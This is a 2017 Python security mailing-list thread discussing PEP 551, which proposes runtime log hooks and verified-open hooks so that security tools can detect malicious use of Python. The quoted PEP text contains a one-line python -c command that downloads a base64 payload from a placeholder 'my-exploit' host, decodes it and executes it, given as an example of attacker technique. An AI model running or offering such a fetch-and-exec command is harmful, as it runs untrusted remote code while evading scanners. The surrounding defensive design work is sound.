/usr/sbin/myservice -- gen_context(system_u:object_r:myservice_exec_t,s0)
/usr/lib/python3.6(/.*)? gen_context(system_u:object_r:python_module_t,s0)

# definitions
type myservice_t;
type myservice_exec_t;
init_daemon_domain(myservice_t, myservice_exec_t)

type python_module_t;
files_type(python_module_t)

allow myservice_t python_module_t:file { getattr open read };


We can talk about SELinux during the sprint. If you like, Nick, Victor,
or I could contact some engineers from SELinux (Dan) and the Linux
auditing team (Paul, RGB) here at Red Hat.

Christian

From christian at python.org  Fri Aug 25 14:05:02 2017
From: christian at python.org (Christian Heimes)
Date: Fri, 25 Aug 2017 20:05:02 +0200
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
Message-ID: <66e0917a-0524-d14c-565b-0641b363eb5a@python.org>

On 2017-08-24 19:13, Steve Dower wrote:
> Hi security-sig,
> 
> Those of you who were at the PyCon US language summit this year (or who
> saw the coverage at https://lwn.net/Articles/723823/) may recall that I
> talked briefly about the ways Python is used by attackers to gain and/or
> retain access to systems on local networks.
[...]
> TODO - more hooks in ``_socket``, ``_ssl``, others?

Does it make sense to include mmap()? After all, mmap can be used to
execute arbitrary machine code in memory.

For the SSL module, what would you like to log? Server certs and
connection parameters (cipher suite)?

Christian

From steve.dower at python.org  Fri Aug 25 16:23:53 2017
From: steve.dower at python.org (Steve Dower)
Date: Fri, 25 Aug 2017 13:23:53 -0700
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <e58db67e-30b0-f9e2-6b4c-cd9fe651f0fe@python.org>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CADiSq7d83-o9e8WgUUuhhb+M=P+PdEb+HMHR0vzPPxAcYv+Wsg@mail.gmail.com>
 <df3f3111-a541-dcad-7b33-0fdd31615706@python.org>
 <e58db67e-30b0-f9e2-6b4c-cd9fe651f0fe@python.org>
Message-ID: <94d78dd8-abc9-8664-bcc7-c72c0cd47adc@python.org>

On 25Aug2017 1058, Christian Heimes wrote:
> Here is a simplified and partial example for a simple Python
> 'myservice'. When the service is started by the init system, the process
> automatically transitions into the myservice_t domain.
> 
> [SNIP]
I feel like the piece I'm missing is what needs to be added to the 
CPython source to make this all work. (As with auditd - when Nick 
pointed it out to me I wasn't comfortable until I found a sample using 
audit_open().)

> We can talk about SELinux during the sprint. If you like, either Nick,
> Victor, or I could contact some engineers from SELinux (Dan) and Linux
> auditing team (Paul, RGB) here at Red Hat.

I'm very keen for as many platform-specific proofs of concept as 
possible. The more people who are thinking "if I had this information 
available, what would I do with it?" the better.

Cheers,
Steve

From steve.dower at python.org  Fri Aug 25 16:29:26 2017
From: steve.dower at python.org (Steve Dower)
Date: Fri, 25 Aug 2017 13:29:26 -0700
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <66e0917a-0524-d14c-565b-0641b363eb5a@python.org>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <66e0917a-0524-d14c-565b-0641b363eb5a@python.org>
Message-ID: <208bad1b-168c-3579-2295-7742a28ce111@python.org>

On 25Aug2017 1105, Christian Heimes wrote:
> On 2017-08-24 19:13, Steve Dower wrote:
>> Hi security-sig,
>>
>> Those of you who were at the PyCon US language summit this year (or who
>> saw the coverage at https://lwn.net/Articles/723823/) may recall that I
>> talked briefly about the ways Python is used by attackers to gain and/or
>> retain access to systems on local networks.
> [...]
>> TODO - more hooks in ``_socket``, ``_ssl``, others?
> 
> Does it make sense to include mmap()? After all, mmap can be used to
> execute arbitrary machine code in memory.

Yes, absolutely. I think array and struct can too without having to go 
through ctypes.

> For the SSL module, what would you like to log? Server certs and
> connection parameters (cipher suite)?

I've seen some samples of code that disable validation or use alternate 
CA certs. Probably context creation is the most important aspect, since 
I think a lot of the rest will be caught by the _socket module. There's 
a good balance somewhere between collecting all network traffic (though 
not necessarily keeping it anywhere) and none, but I'm not entirely sure 
where that is yet.
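
As a rough illustration of what a hook on SSL context creation might record, the sketch below summarizes the settings relevant to the cases above (code that disables certificate or host name validation). describe_ssl_context and weakened_verification are hypothetical helpers and the field names are illustrative rather than a proposed event schema; only the ssl.SSLContext attributes they read are real.

```python
import ssl


def describe_ssl_context(ctx: ssl.SSLContext) -> dict:
    """Collect SSLContext settings that a log hook might record.

    Hypothetical helper: the keys are illustrative, not a defined schema.
    """
    return {
        "protocol": ctx.protocol.name,        # e.g. "PROTOCOL_TLS_CLIENT"
        "verify_mode": ctx.verify_mode.name,  # e.g. "CERT_REQUIRED"
        "check_hostname": ctx.check_hostname,
    }


def weakened_verification(ctx: ssl.SSLContext) -> bool:
    """True if certificate or host name validation has been turned off."""
    return ctx.verify_mode == ssl.CERT_NONE or not ctx.check_hostname
```

A context from ssl.create_default_context() is not flagged; one where check_hostname has been cleared and verify_mode set to ssl.CERT_NONE is.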

I'll probably spend a day this weekend continuing to go through the 
stdlib and see what I think should be included. No doubt we'll spend 
time at the sprints arguing over specific items - I'm looking forward to 
it :)

Cheers,
Steve

From christian at python.org  Fri Aug 25 17:23:51 2017
From: christian at python.org (Christian Heimes)
Date: Fri, 25 Aug 2017 23:23:51 +0200
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <94d78dd8-abc9-8664-bcc7-c72c0cd47adc@python.org>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CADiSq7d83-o9e8WgUUuhhb+M=P+PdEb+HMHR0vzPPxAcYv+Wsg@mail.gmail.com>
 <df3f3111-a541-dcad-7b33-0fdd31615706@python.org>
 <e58db67e-30b0-f9e2-6b4c-cd9fe651f0fe@python.org>
 <94d78dd8-abc9-8664-bcc7-c72c0cd47adc@python.org>
Message-ID: <9146e1e5-8cec-9442-f3a4-618acf86cbcf@python.org>

On 2017-08-25 22:23, Steve Dower wrote:
> On 25Aug2017 1058, Christian Heimes wrote:
>> Here is a simplified and partial example for a simple Python
>> 'myservice'. When the service is started by the init system, the process
>> automatically transitions into the myservice_t domain.
>>
>> [SNIP]
> I feel like the piece I'm missing is what needs to be added to the
> CPython source to make this all work. (As with auditd - when Nick
> pointed it out to me I wasn't comfortable until I found a sample using
> audit_open().)

I need to talk to some people before I can give you a good answer. A
poor man's solution would look like this:

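import selinux  # libselinux Python bindings

with open(modulefile, 'rb') as f:
    # fgetfilecon() returns (length, context) for the open file descriptor
    _, context = selinux.fgetfilecon(f.fileno())
    # the MLS/MCS level may itself contain ':', so split at most 3 times
    user, role, type_, level = context.split(':', 3)
    if type_ != 'python_module_t':
        raise PermissionError(modulefile)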

I'm pretty sure it is the wrong approach. Python should not check
SELinux labels. Instead we should ask if the current process context is
allowed to perform a specific action (import a Python file) for a file
with a certain context. I don't know how to achieve this kind of check.
Perhaps something like this may work:

avc_has_perm(
    getcon(),
    fgetfilecon(f.fileno()),
    SECCLASS_FILE,
    FILE__EXECUTE,
    metadata  # to be filled with file name
)

This would also log proper audit events.

>> We can talk about SELinux during the sprint. If you like, either Nick,
>> Victor, or I could contact some engineers from SELinux (Dan) and Linux
>> auditing team (Paul, RGB) here at Red Hat.
> 
> I'm very keen for as many platform-specific proofs of concept as
> possible. The more people who are thinking "if I had this information
> available, what would I do with it?" the better.

I'll try to get in contact with some people on Monday.

Christian

From brett at python.org  Sat Aug 26 09:45:35 2017
From: brett at python.org (Brett Cannon)
Date: Sat, 26 Aug 2017 13:45:35 +0000
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <E1dl4HZ-0007dO-Sb@se2-syd.hostedmail.net.au>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CAP1=2W6Kmjfrkg49hkT8B--cZmO=Nd4W4cvjrrYL8NoJbGuxxw@mail.gmail.com>
 <E1dl4HZ-0007dO-Sb@se2-syd.hostedmail.net.au>
Message-ID: <CAP1=2W43bRebitrQpRbR0U0z2AusGozutDWyaFL1vjD-8UAmyg@mail.gmail.com>

Is there going to be a visible flag or anything to know you're running a
restricted version of Python? If so, then a subclass will allow us to
override get_code() so that it just skips .pyc files and it can be used
automatically when the flag is set. That way users of spython don't have to
think about setting that up. Otherwise we could provide a function in
importlib._bootstrap that you call during initialization to turn this on.
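
A minimal sketch of the subclass approach, using only the existing importlib.machinery.SourceFileLoader API: get_code() is overridden to compile straight from source, so cached bytecode is never read or written. SourceOnlyFileLoader and load_source_only are hypothetical names, and wiring the loader in automatically (via a flag or an importlib._bootstrap function) is not shown.

```python
import importlib.machinery
import importlib.util


class SourceOnlyFileLoader(importlib.machinery.SourceFileLoader):
    """A SourceFileLoader that never reads or writes cached .pyc files."""

    def get_code(self, fullname):
        path = self.get_filename(fullname)
        # All source bytes still flow through get_data(), so a verifying
        # open placed there also covers this loader.
        source = self.get_data(path)
        # Compile directly; the base class would consult __pycache__ first
        # and write bytecode back afterwards.
        return self.source_to_code(source, path)


def load_source_only(name, path):
    """Import the file at *path* as module *name* without touching bytecode."""
    loader = SourceOnlyFileLoader(name, path)
    spec = importlib.util.spec_from_file_location(name, path, loader=loader)
    module = importlib.util.module_from_spec(spec)
    loader.exec_module(module)
    return module
```

Because the base get_code() is bypassed, no __pycache__ directory is created next to the imported file.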

P.S. sorry to everyone for the slightly scattered comments; doing all of
these emails from my phone while in NYC for JupyterCon.

On Thu, Aug 24, 2017, 22:24 Steve Dower <steve.dower at python.org> wrote:

> I think overriding get_data in the subclass for source loading is the
> right approach. Rejecting .pyc files in the hook is easy enough, but for
> anyone doing proper validation (with a certificate or access control) I'd
> expect pyc's to fail anyway.
>
> Top-posted from my Windows phone
>
> *From: *Brett Cannon <brett at python.org>
> *Sent: *Thursday, August 24, 2017 18:58
> *To: *Steve Dower <steve.dower at python.org>; security-sig at python.org
> *Cc: *lee.holmes at microsoft.com; james at dontusethiscode.com
> *Subject: *Re: PEP 551: Security transparency in the Python runtime
>
> One point to make about the importlib changes: since they are currently
> being made to importlib.abc.FileLoader.get_data()
> <https://docs.python.org/3/library/importlib.html#importlib.abc.FileLoader.get_data>,
> the default case for reading a non-.py file should be to do nothing and allow
> the read to occur. Otherwise there will be issues with code that is using
> that method to read data files (which is a legit use-case). Otherwise we're
> going to need a new subclass of importlib.machinery.SourceFileLoader where
> we document that you can't use get_data() to read arbitrary bytes or
> restructure get_code() to not use get_data(). Or we need a new API to flag
> when get_data() should do a verifying open().
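
A minimal sketch of the behaviour described here, assuming a hypothetical verify(path, data) callback supplied by whoever embeds Python: only paths ending in .py are checked, and every other read through get_data() is passed through unchanged, so reading data files keeps working. VerifyingSourceFileLoader is also a hypothetical name.

```python
import importlib.machinery


class VerifyingSourceFileLoader(importlib.machinery.SourceFileLoader):
    """Run a verification callback on .py sources; read other files as usual.

    `verify` is a hypothetical callable(path, data) that raises (for example
    PermissionError) to reject a file.
    """

    def __init__(self, fullname, path, verify):
        super().__init__(fullname, path)
        self._verify = verify

    def get_data(self, path):
        data = super().get_data(path)
        # Only Python source is verified; data files pass through untouched.
        if str(path).endswith(".py"):
            self._verify(path, data)
        return data
```

Note that the stock get_code() also reads cached .pyc files through get_data(), and those bypass this check, which is the bytecode issue raised in the next paragraph.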
>
> There is also the issue of not reading .pyc files, which will either
> have to be addressed by coming up with a complementary flag to
> PYTHONDONTWRITEBYTECODE or once again a special subclass where get_code()
> ignores bytecode completely.
>
> On Thu, 24 Aug 2017 at 13:14 Steve Dower <steve.dower at python.org> wrote:
>
> Hi security-sig,
>
> Those of you who were at the PyCon US language summit this year (or who
> saw the coverage at https://lwn.net/Articles/723823/) may recall that I
> talked briefly about the ways Python is used by attackers to gain and/or
> retain access to systems on local networks.
>
> This comes out of work we've been doing at Microsoft to balance the
> flexibility of scripting languages with their usefulness to malicious
> users. PowerShell in particular has had a lot of work done, and we've
> been doing the same internally for Python. Things like transcripting
> (log every piece of code when it is compiled) and signature validation
> (prevent loading unsigned code).
>
> This PEP is about upstreaming enough functionality to make it easier to
> maintain these features - it is *not* intended to add specific security
> features to the core release. The aim is to be able to use a standard
> libpython3.7/python37.dll with a custom python3.7/python.exe that adds
> those features (listed in the PEP).
>
> Right now parts of the PEP are incomplete. In particular, the
> Recommendations section is much shorter than I intend, the list of log
> hook locations is also too short, and I have only done a preliminary
> performance analysis. But it's time to get reviews of the overall
> concept. I'd also like to take suggestions for more hook locations and
> relevant recommendations, so feel free to throw them out there. In
> particular, I'm not as up to date on best practices for non-Windows
> platforms as the rest of the list, so feel free to correct or improve
> those parts.
>
> Because ReST+max 80 character width makes tables completely unreadable
> in source, I suggest reading it at
> https://github.com/python/peps/blob/master/pep-0551.rst but I've
> included the full text below for quoting purposes.
>
> My current implementation is available at
> https://github.com/zooba/cpython/tree/sectrans and should work on both
> Windows and Linux. I hope to take this to python-dev by next week and
> spend the dev sprints getting the PEP to the point where it can be
> accepted.
>
> ==========================================================
>
> PEP: 551
> Title: Security transparency in the Python runtime
> Version: $Revision$
> Last-Modified: $Date$
> Author: Steve Dower <steve.dower at python.org>
> Status: Draft
> Type: Standards Track
> Content-Type: text/x-rst
> Created: 23-Aug-2017
> Python-Version: 3.7
> Post-History:
>
> Abstract
> ========
>
> This PEP describes additions to the Python API and specific behaviors for the
> CPython implementation that make actions taken by the Python runtime visible
> to security and auditing tools. The goals in order of increasing importance
> are to prevent malicious use of Python, to detect and report on malicious
> use, and most importantly to detect attempts to bypass detection. Most of the
> responsibility for implementation falls on users, who must customize and
> build Python for their own environment.
>
> We propose two small sets of public APIs to enable users to reliably build
> their copy of Python without having to modify the core runtime, protecting
> future maintainability. We also discuss recommendations for users to help
> them develop and configure their copy of Python.
>
> Background
> ==========
>
> Software vulnerabilities are generally seen as bugs that enable remote or
> elevated code execution. However, in our modern connected world, the more
> dangerous vulnerabilities are those that enable advanced persistent threats
> (APTs). APTs are achieved when an attacker is able to penetrate a network,
> establish their software on one or more machines, and over time extract data
> or intelligence. Some APTs may make themselves known by maliciously damaging
> data (e.g., `WannaCrypt
> <https://www.microsoft.com/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/WannaCrypt>`_)
> or hardware (e.g., `Stuxnet
> <https://www.microsoft.com/wdsi/threats/malware-encyclopedia-description?name=Win32/Stuxnet>`_).
> Most attempt to hide their existence and avoid detection. APTs often use a
> combination of traditional vulnerabilities, social engineering, phishing (or
> spear-phishing), thorough network analysis, and an understanding of
> misconfigured environments to establish themselves and do their work.
>
> The first infected machines may not be the final target and may not require
> special privileges. For example, an APT that is established as a
> non-administrative user on a developer's machine may have the ability to
> spread to production machines through normal deployment channels. It is
> common for APTs to persist on as many machines as possible, with sheer weight
> of presence making them difficult to remove completely.
>
> Whether an attacker is seeking to cause direct harm or hide their tracks, the
> biggest barrier to detection is a lack of insight. System administrators with
> large networks rely on distributed logs to understand what their machines are
> doing, but logs are often filtered to show only error conditions. APTs that
> are attempting to avoid detection will rarely generate errors or abnormal
> events. Reviewing normal operation logs involves a significant amount of
> effort, though work is underway by a number of companies to enable automatic
> anomaly detection within operational logs. The tools preferred by attackers
> are ones that are already installed on the target machines, since log
> messages from these tools are often expected and ignored in normal use.
>
> At this point, we are not going to spend further time discussing the
> existence of APTs or methods and mitigations that do not apply to this PEP.
> For further information about the field, we recommend reading or watching the
> resources listed under `Further Reading`_.
>
> Python is a particularly interesting tool for attackers due to its prevalence
> on server and developer machines, its ability to execute arbitrary code
> provided as data (as opposed to native binaries), and its complete lack of
> internal logging. This allows attackers to download, decrypt, and execute
> malicious code with a single command::
>
>     python -c "import urllib.request, base64; exec(base64.b64decode(urllib.request.urlopen('http://my-exploit/py.b64').read()).decode())"
>
> This command currently bypasses most anti-malware scanners that rely on
> recognizable code being read through a network connection or being written to
> disk (base64 is often sufficient to bypass these checks). It also bypasses
> protections such as file access control lists or permissions (no file access
> occurs), approved application lists (assuming Python has been approved for
> other uses), and automated auditing or logging (assuming Python is allowed to
> access the internet or access another machine on the local network from which
> to obtain its payload).
>
> General consensus among the security community is that totally preventing
> attacks is infeasible and defenders should assume that they will often detect
> attacks only after they have succeeded. This is known as the "assume breach"
> mindset. [1]_ In this scenario, protections such as sandboxing and input
> validation have already failed, and the important task is detection,
> tracking, and eventual removal of the malicious code. To this end, the
> primary feature required from Python is security transparency: the ability to
> see what operations the Python runtime is performing that may indicate
> anomalous or malicious use. Preventing such use is valuable, but secondary to
> the need to know that it is occurring.
>
> To summarise the goals in order of increasing importance:
>
> * preventing malicious use is valuable
> * detecting malicious use is important
> * detecting attempts to bypass detection is critical
>
> One example of a scripting engine that has addressed these challenges is
> PowerShell, which has recently been enhanced towards similar goals of
> transparency and prevention. [2]_
>
> Generally, application and system configuration will determine which events
> within a scripting engine are worth logging. However, given that the value of
> many logged events is not recognized until after an attack is detected, it
> is important to capture as much as possible and filter views rather than
> filtering at the source (see the No Easy Breach video listed under
> `Further Reading`_). Events that are always of interest include attempts to
> bypass event logging, attempts to load and execute code that is not correctly
> signed or access-controlled, use of uncommon operating system functionality
> such as debugging or inter-process inspection tools, most network access and
> DNS resolution, and attempts to create and hide files or configuration
> settings on the local machine.
>
> To summarize, defenders have a need to audit specific uses of Python in order
> to detect abnormal or malicious usage. Currently, the Python runtime does not
> provide any ability to do this, which (anecdotally) has led to organizations
> switching to other languages. The aim of this PEP is to enable system
> administrators to deploy a security transparent copy of Python that can
> integrate with their existing auditing and protection systems.
>
> On Windows, some specific features that may be enabled by this include:
>
> * Script Block Logging [3]_
> * DeviceGuard [4]_
> * AMSI [5]_
> * Persistent Zone Identifiers [6]_
> * Event tracing (which includes event forwarding) [7]_
>
> On Linux, some specific features that may be integrated are:
>
> * gnupg [8]_
> * sd_journal [9]_
> * OpenBSM [10]_
> * syslog [11]_
> * check execute bit on imported modules
>
>
> On macOS, some features that may be used with the expanded APIs are:
>
> * OpenBSM [10]_
> * syslog [11]_
>
> Overall, the ability to enable these platform-specific features on production
> machines is highly appealing to system administrators and will make Python a
> more trustworthy dependency for application developers.
>
>
> Overview of Changes
> ===================
>
> True security transparency is not fully achievable by Python in isolation.
> The runtime can log as many events as it likes, but unless the logs are
> reviewed and analyzed there is no value. Python may impose restrictions in
> the name of security, but usability may suffer. Different platforms and
> environments will require different implementations of certain security
> features, and organizations with the resources to fully customize their
> runtime should be encouraged to do so.
>
> The aim of these changes is to enable system administrators to integrate
> Python into their existing security systems, without dictating what those
> systems look like or how they should behave. We propose two API changes to
> enable this: an Event Log Hook and a Verified Open Hook. Neither is set by
> default, and both require modifying the appropriate entry point to enable any
> functionality. For the purposes of validation and example, we propose a new
> spython/spython.exe entry point program that enables some basic functionality
> using these hooks. However, the expectation is that security-conscious
> organizations will create their own entry points to meet their needs.
>
> Event Log Hook
> --------------
>
> In order to achieve security transparency, an API is required to raise
> messages from within certain operations. These operations are typically deep
> within the Python runtime or standard library, such as dynamic code
> compilation, module imports, DNS resolution, or use of certain modules such
> as ``ctypes``.
>
> The new APIs required for log hooks are::
>
>     # Add a logging hook
>     sys.addloghook(hook: Callable[[str, tuple], None]) -> None
>     int PySys_AddLogHook(int (*hook)(const char *event, PyObject *args));
>
>     # Raise an event with all logging hooks
>     sys.loghook(str, *args) -> None
>     int PySys_LogHook(const char *event, PyObject *args);
>
>     # Internal API used during Py_Finalize() - not publicly accessible
>     void _Py_ClearLogHooks(void);
>
> Hooks are added by calling ``PySys_AddLogHook()`` from C at any time,
> including before ``Py_Initialize()``, or by calling ``sys.addloghook()`` from
> Python code. Hooks are never removed or replaced, and existing hooks have an
> opportunity to refuse to allow new hooks to be added (adding a logging hook
> is logged, and so preexisting hooks can raise an exception to block the new
> addition).
>
> When events of interest are occurring, code can either call
> ``PySys_LogHook()`` from C (while the GIL is held) or ``sys.loghook()``. The
> string argument is the name of the event, and the tuple contains arguments.
> A given event name should have a fixed schema for arguments, and both
> arguments are considered a public API (for a given x.y version of Python),
> and thus should only change between feature releases with updated
> documentation.
>
> When an event is logged, each hook is called in the order it was added with
> the event name and tuple. If any hook returns with an exception set, later
> hooks are ignored and *in general* the Python runtime should terminate. This
> is intentional to allow hook implementations to decide how to respond to any
> particular event. The typical responses will be to log the event, abort the
> operation with an exception, or to immediately terminate the process with an
> operating system exit call.
>
> When an event is logged but no hooks have been set, the ``loghook()``
> function should add minimal overhead. Ideally, each argument is a reference
> to existing data rather than a value calculated just for the logging call.
>
> As hooks may be Python objects, they need to be freed during
> ``Py_Finalize()``. To do this, we add an internal API ``_Py_ClearLogHooks()``
> that releases any ``PyObject*`` hooks that are held, as well as any heap
> memory used. This is an internal function with no public export, but it
> passes an event to all existing hooks to ensure that unexpected calls are
> logged.
>
> See `Log Hook Locations`_ for proposed log hook points and schemas, and the
> `Recommendations`_ section for discussion on appropriate responses.
>
> Verified Open Hook
> ------------------
>
> Most operating systems have a mechanism to distinguish between files that
> can be executed and those that cannot. For example, this may be an execute
> bit in the permissions field, or a verified hash of the file contents to
> detect potential code tampering. These are an important security mechanism
> for preventing execution of data or code that is not approved for a given
> environment. Currently, Python has no way to integrate with these when
> launching scripts or importing modules.
>
> The new public API for the verified open hook is::
>
>     # Set the handler
>     int Py_SetOpenForExecuteHandler(PyObject *(*handler)(const char *narrow, const wchar_t *wide));
>
>     # Open a file using the handler
>     os.open_for_exec(pathlike)
>
> The ``os.open_for_exec()`` function is a drop-in replacement for
> ``open(pathlike, 'rb')``. Its default behaviour is to open a file for raw,
> binary access - any more restrictive behaviour requires the use of a custom
> handler. (Aside: since ``importlib`` requires access to this function before
> the ``os`` module has been imported, it will be available on the
> ``nt``/``posix`` modules, but the intent is that other users will access it
> through the ``os`` module.)
>
> A custom handler may be set by calling ``Py_SetOpenForExecuteHandler()`` from
> C at any time, including before ``Py_Initialize()``. When
> ``open_for_exec()`` is called with a handler set, the handler will be passed
> the processed narrow or wide path, depending on platform, and its return
> value will be returned directly. The returned object should be an open
> file-like object that supports reading raw bytes. This is explicitly intended
> to allow a ``BytesIO`` instance if the open handler has already had to read
> the file into memory in order to perform whatever verification is necessary
> to determine whether the content is permitted to be executed.
>
> Note that these handlers can import and call the ``_io.open()`` function on
> CPython without triggering themselves.
>
> If the handler determines that the file is not suitable for execution, it
> should raise an exception of its choice, as well as performing any other
> logging or notifications.
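
The following pure-Python model sketches a handler that reads the whole file, checks its SHA-256 digest against an allow-list, and returns a ``BytesIO`` as described above. ``set_open_for_exec_handler``, ``open_for_exec`` and ``make_hash_allowlist_handler`` are hypothetical stand-ins for the proposed C-level ``Py_SetOpenForExecuteHandler()`` and ``os.open_for_exec()``, and the allow-list is assumed to come from the deployment.

```python
import hashlib
import io
from typing import BinaryIO, Callable, Optional, Set

# Pure-Python model of the proposed open_for_exec()/handler pair; these names
# are hypothetical stand-ins, not real os or CPython APIs.
_handler: Optional[Callable[[str], BinaryIO]] = None


def set_open_for_exec_handler(handler: Callable[[str], BinaryIO]) -> None:
    global _handler
    _handler = handler


def open_for_exec(path: str) -> BinaryIO:
    """Default: plain binary open; otherwise defer entirely to the handler."""
    if _handler is None:
        return open(path, "rb")
    return _handler(path)


def make_hash_allowlist_handler(allowed_sha256: Set[str]):
    """Build a handler that only returns files whose SHA-256 is allow-listed."""
    def handler(path: str) -> BinaryIO:
        # The builtin open() is used here, so the handler does not re-enter
        # open_for_exec() (the model's analogue of calling _io.open()).
        with open(path, "rb") as f:
            data = f.read()
        if hashlib.sha256(data).hexdigest() not in allowed_sha256:
            raise PermissionError(f"{path}: content not approved for execution")
        # The file is already in memory, so hand back a BytesIO.
        return io.BytesIO(data)
    return handler
```

Returning the same bytes that were hashed avoids a gap between checking the file and reading it again for execution.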
>
> All import and execution functionality involving code from a file will be
> changed to use ``open_for_exec()`` unconditionally. It is important to note
> that calls to ``compile()``, ``exec()`` and ``eval()`` do not go through this
> function - a log hook that includes the code from these calls will be added
> and is the best opportunity to validate code that is read from the file.
> Given the current decoupling between import and execution in Python, most
> imported code will go through both ``open_for_exec()`` and the log hook for
> ``compile``, and so care should be taken to avoid repeating verification
> steps.
>
> API Availability
> ----------------
>
> While all the functions added here are considered public and stable API, the
> behavior of the functions is implementation specific. The descriptions here
> refer to the CPython implementation, and while other implementations should
> provide the functions, there is no requirement that they behave the same.
>
> For example, ``sys.addloghook()`` and ``sys.loghook()`` should exist but may
> do nothing. This allows code to make calls to ``sys.loghook()`` without
> having to test for existence, but it should not assume that its call will
> have any effect. (Including existence tests in security-critical code allows
> another vector to bypass logging, so it is preferable that the function
> always exist.)
>
> ``os.open_for_exec()`` should at a minimum always return
> ``_io.open(pathlike, 'rb')``. Code using the function should make no further
> assumptions about what may occur, and implementations other than CPython are
> not required to let developers override the behavior of this function with a
> hook.
>
>
> Log Hook Locations
> ==================
>
> Calls to ``sys.loghook()`` or ``PySys_LogHook()`` will be added to the
> following operations with the schema in Table 1. Unless otherwise specified,
> the ability for log hooks to abort any listed operation should be considered
> part of the rationale for including the hook.
>
> .. csv-table:: Table 1: Log Hooks
>     :header: "API Function", "Event Name", "Arguments", "Rationale"
>     :widths: 2, 2, 3, 6
>
>     ``PySys_AddLogHook``, ``sys.addloghook``, "", "Detect when new log hooks are
>     being added."
>     ``_PySys_ClearLogHooks``, ``sys._clearloghooks``, "", "Notifies hooks they
>     are being cleaned up, mainly in case the event is triggered unexpectedly.
>     This event cannot be aborted."
>     ``Py_SetOpenForExecuteHandler``, ``setopenforexecutehandler``, "", "Detects
>     any attempt to set the ``open_for_execute`` handler."
>     "``compile``, ``exec``, ``eval``, ``PyAst_CompileString``", ``compile``, "
>     ``(code, filename_or_none)``", "Detect dynamic code compilation. Note that
>     this will also be called for regular imports of source code, including
>     those that used ``open_for_exec``."
>     ``import``, ``import``, "``(module, filename, sys.path, sys.meta_path,
>     sys.path_hooks)``", "Detect when modules are imported. This is raised
>     before the module name is resolved to a file. All arguments other than the
>     module name may be ``None`` if they are not used or available."
>     "``_ctypes.dlopen``, ``_ctypes.LoadLibrary``", ``ctypes.dlopen``, "
>     ``(module_or_path,)``", "Detect when native modules are used."
>     ``_ctypes._FuncPtr``, ``ctypes.dlsym``, "``(lib_object, name)``", "Collect
>     information about specific symbols retrieved from native modules."
>     ``_ctypes._CData``, ``ctypes.cdata``, "``(ptr_as_int,)``", "Detect when
>     code is accessing arbitrary memory using ``ctypes``."
>     ``id``, ``id``, "``(id_as_int,)``", "Detect when code is accessing the id
>     of objects, which in CPython reveals information about memory layout."
>     ``sys._getframe``, ``sys._getframe``, "``(frame_object,)``", "Detect when
>     code is accessing frames directly."
>     ``sys._current_frames``, ``sys._current_frames``, "", "Detect when code is
>     accessing frames directly."
>     ``PyEval_SetProfile``, ``sys.setprofile``, "", "Detect when code is
>     injecting trace functions. Because of the implementation, exceptions raised
>     from the hook will abort the operation, but will not be raised in Python
>     code. Note that ``threading.setprofile`` eventually calls this function, so
>     the event will be logged for each thread."
>     ``PyEval_SetTrace``, ``sys.settrace``, "", "Detect when code is injecting
>     trace functions. Because of the implementation, exceptions raised from the
>     hook will abort the operation, but will not be raised in Python code. Note
>     that ``threading.settrace`` eventually calls this function, so the event
>     will be logged for each thread."
>     ``_PyEval_SetAsyncGenFirstiter``, ``sys.set_async_gen_firstiter``, "", "
>     Detect changes to async generator hooks."
>     ``_PyEval_SetAsyncGenFinalizer``, ``sys.set_async_gen_finalizer``, "", "
>     Detect changes to async generator hooks."
>     ``_PyEval_SetCoroutineWrapper``, ``sys.set_coroutine_wrapper``, "", "Detect
>     changes to the coroutine wrapper."
>     ``Py_SetRecursionLimit``, ``sys.setrecursionlimit``, "``(new_limit,)``", "
>     Detect changes to the recursion limit."
>     ``_PyEval_SetSwitchInterval``, ``sys.setswitchinterval``, "``(interval_us,)``", "
>     Detect changes to the switching interval."
>     "``socket.bind``, ``socket.connect``, ``socket.connect_ex``,
>     ``socket.sendmsg``, ``socket.sendto``", ``socket.address``, "``(address,)``", "Detect
>     access to network resources. The address is unmodified from the original
>     call."
>     ``socket.__init__``, "socket()", "``(family, type, proto)``", "Detect
>     creation of sockets. The arguments will be int values."
>     ``socket.gethostname``, ``socket.gethostname``, "", "Detect attempts to
>     retrieve the current host name."
>     ``socket.sethostname``, ``socket.sethostname``, "``(name,)``", "Detect
>     attempts to change the current host name. The name argument is passed as a
>     bytes object."
>     "``socket.gethostbyname``, ``socket.gethostbyname_ex``", "
>     ``socket.gethostbyname``", "``(name,)``", "Detect host name resolution. The
>     name argument is a str or bytes object."
>     ``socket.gethostbyaddr``, ``socket.gethostbyaddr``, "``(address,)``", "Detect
>     host resolution. The address argument is a str or bytes object."
>     ``socket.getservbyname``, ``socket.getservbyname``, "``(name, protocol)``", "
>     Detect service resolution. The arguments are str objects."
>     ``socket.getservbyport``, ``socket.getservbyport``, "``(port, protocol)``", "
>     Detect service resolution. The port argument is an int and protocol is a
>     str."
>
> TODO - more hooks in ``_socket``, ``_ssl``, others?
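
As an illustration of how the events in Table 1 might be consumed, the sketch below shows a hypothetical policy hook using the ``(event, args)`` signature proposed for ``sys.addloghook()``. The ``BLOCKED_EVENTS`` set and the log message format are assumptions made for the example, not recommendations from this PEP.

```python
import logging

log = logging.getLogger("security")

# Events from Table 1 that this hypothetical policy refuses outright.
BLOCKED_EVENTS = {"ctypes.dlopen", "sys.settrace", "sys.setprofile"}


def policy_hook(event: str, args: tuple) -> None:
    """Hypothetical hook for the proposed log-hook API.

    Records every event, then aborts selected operations by raising.
    """
    if event == "compile":
        code, filename = args
        # Log only the first 200 characters of the repr to bound record size.
        log.info("compile %r: %.200r", filename, code)
    elif event == "socket.address":
        (address,) = args
        log.info("network access to %r", address)
    else:
        log.info("%s %r", event, args)
    if event in BLOCKED_EVENTS:
        raise PermissionError(f"{event} is not permitted by policy")
```

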